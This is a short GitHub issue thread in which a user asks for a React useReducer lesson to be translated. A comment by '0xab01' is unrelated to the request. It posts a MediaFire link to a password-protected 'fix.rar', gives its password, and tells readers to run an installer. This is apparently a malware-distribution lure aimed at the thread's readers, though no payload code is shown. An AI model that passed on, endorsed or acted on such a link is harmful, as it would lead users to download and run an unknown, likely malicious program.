### ISSUE TITLE
Traducir lectura

### ISSUE THREAD

**Issue by Lorenagubaira** [breatheco-de/breatheco-de#7753]
https://github.com/Lorenagubaira/content/blob/95d9dc223e22d411acea078c63cca4f005ba0967/src/content/lesson/usereducer-react.md

**Comment by 0xab01** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
